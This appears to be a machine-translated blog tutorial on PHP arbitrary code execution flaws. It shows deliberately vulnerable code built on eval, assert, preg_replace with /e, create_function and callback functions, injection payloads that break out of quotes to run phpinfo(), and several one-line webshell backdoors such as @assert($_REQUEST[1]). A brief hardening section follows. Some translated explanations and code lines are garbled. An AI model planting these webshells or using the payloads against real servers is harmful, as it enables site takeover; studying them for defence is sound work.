Arbitrary Code Execution Vulnerability

Posted by wpsd2006 on Wed, 23 Feb 2022 13:13:44 +0100

catalogue

1, What is an arbitrary code execution vulnerability

2, Harm of vulnerability

3, Arbitrary Code Execution Vulnerability

1. Exploit of eval() function

Exploit function (1 EVAL)_ one

1.2 exploit of eval() function_ two

1.3. Exploit of eval() function_ three

1.4preg_replace+/e utilization

2.assert() function

3.preg_replace();

4. create_function() function

5.array_map() function

 6.call_user_func() and call_user_func_array() function (same principle)

7.array_filter() function

8. usort() and uasort() functions

9.$_GET['a']($_GET['b'])

4, Protection of Arbitrary Code Execution Vulnerability

1, What is an arbitrary code execution vulnerability

web application refers to the programmer using some execution functions in the code, such as eval, assert and other functions. Users can control the string to execute in these functions, resulting in security vulnerabilities

2, Harm of vulnerability

  • Execute arbitrary code, such as protocol script files
  • Write webshell to web site
  • Control the whole website or server

3, Arbitrary Code Execution Vulnerability

1. Exploit of eval() function

1.1 exploit of eval() function_ one

Front end incoming parameters:

(1)?data=phpinfo();

(2)?/data=1;phpinfo();

(3)?data=${phpinfo()}

View backend code:

<?php 
	//Receive get parameters
	$data = $_GET['data'];
	//eval function usage 	
	eval("\$ret = $data;"); 
	echo $ret;
 ?>

1.2 exploit of eval() function_ two

View backend code:

<?php
	//Turn off magic method  
	//Strtower converts a string to lowercase
	$data=$_GET['data'];
	//Single quotation mark mode
	eval("\$ret = strtolower('$data');");
	

	echo $ret;
?>

Execute the back-end code. At this time, check that the input is phpinfo() string, not version. At this time, we need to change the parameters

Parameter passing method: close the front, the back of the comment, and execute the middle code

1.2.1 /?data=1');phpinfo();//

1.2.2 /?data=1');phpinfo();('

 

 

1.3. Exploit of eval() function_ three

<?php 
	//Double quotation marks
	$data=$_GET['data'];
	eval("\$ret = strtolower(\"$data\");");
	echo $ret;

 ?>

Pass parameter execution code:

Input string

1.3.1 parameter transfer method: close the front and the back of the comment, and execute the middle code

Closing mode: /? data=1");phpinfo(); / / or? data=");phpinfo();("1

Non closed mode: ${phpinfo()} (php5.5 +)

1.4preg_replace+/e utilization

Backend code:

<?php 
	
	$data = $_GET['data'];
	//Regular matching
	$preg = '/<data>(.*)<\/data>/e';
	//Regular replacement matches the string of regular replacement content operations
	preg_replace($preg,'$ret="\\1";', $data);
	echo $ret;
 ?>

Parameter input: use ${} otherwise the content will be output as a string /? data = <data>${phpinfo()}</data>

 

2.assert() function

Back end code

<?php 
	// assert(phpinfo()); // View php version
	@assert($_REQUEST[1]);  //In a word
 ?>

 

3.preg_replace();

<?php 
	//Define a string
	/*$str = 'aBcdeFg';
	echo $str;
	//Regular matching
	$preg = '/(\w+)/i';
	//Define replacement content
	$aa = 'suics';
	echo '<br>';
	//A string that performs string replacement regular matching character replacement operations
	echo preg_replace($preg, $aa, $str); //suics*/

	//The problem is that when the / e modifier is used in regular matching, the replacement content will be executed as PHP code and cancelled above version 5.7
	$str = 'sCdScds';
	//Use / e modifier
	$preg = '/\w+/ie';
	//Define the replacement string as php executable code example: phpinfo()
	// $aa = 'phpinfo()';
	//If the character replaced here is controllable
	$aa = "$_POST[1]";
	//Replace
	echo preg_replace($preg, $aa, $str);
 ?>

Execute code,

Connect using tools

You can also view the PHP version through parameters

4. create_function() function

?php 
	//Function internal execution code
	//View php version
	// $func = create_function('',phpinfo());
	// $func();

	//In a word
	$func = create_function('',$_POST[1]);
	$func();
 ?>

Execute code

Connect using tools

5.array_map() function

Backend code:

<?php 	
	//Transfer function name
	$f = $_GET['f']; //assert
	//Passing php execution code
	$c = $_REQUEST['c']; 
	$a[0] = $c;
	// array_map(functionName,arr1,arr2...)
	//Function name (required) 1 or more arrays to be modified (required)
	//Use the $f function to execute $a - > PHP code       
	$arr = array_map($f,$_REQUEST);
	// var_dump($arr);
 ?>

Execute the code

View PHP version

 6.call_user_func() and call_user_func_array() function (same principle)

Backend code:

<?php 	
	//View php version function name + php code
	// call_user_func('assert','phpinfo()');
	$a = $_GET['a']; //Function name example: assert
	$b = $_POST['b']; //One sentence connection password
	call_user_func($a,$b); //assert $_POST['b']
	// 						Function array parameters
	// call_user_func_array(function, param_arr)
	$a = $_GET['a'];
	$b = $_POST['b'];
	$c[0] = $b;
	call_user_func_array($a, $c);

 ?>

Execute code: View PHP version

7.array_filter() function

Backend code:

<?php 
	//            Array callback function
	//array_filter($arr,function);
	$aa = $_GET['aa'];//Enter function name
	$bb = $_POST['bb']; //Function parameters
	$arr[0] = $bb;  //Put into array
	array_filter($arr,$aa);
 ?>

Execute this code to view the PHP version

8. usort() and uasort() functions

View backend code

<?php 
    //Element sorting array custom sorting function
    // usort(array, myfunction)
    //Version 5.4 + / / element sorting array custom sorting function is required
    // usort(array, myfunction)$a = $_POST['a'];
    //Note here that the first variable array needs to add an arbitrary element in the first place
    $b[0] = 1;$b[1] = $a;
    var_dump($b);
    $c = $_GET['c'];
    usort($b, "$c");
 ?>

9.$_GET['a']($_GET['b'])

<?php 
	// $_GET['a']($_GET['b']);
	$_GET['a']($_POST['b']);
?>

Execute code transfer parameters

 

4, Protection of Arbitrary Code Execution Vulnerability

  • For the eval() function, it must be ensured that users cannot easily contact the parameters of Eval or strictly judge the input data format with regularity.
  • For strings, be sure to wrap controllable code in single quotation marks, and add slashes () before inserting
  • For preg_replace discards the use of the e modifier. If you must use the e modifier, make sure that in the second parameter, wrap the regular matching object in single quotation marks.

Topics: security Web Security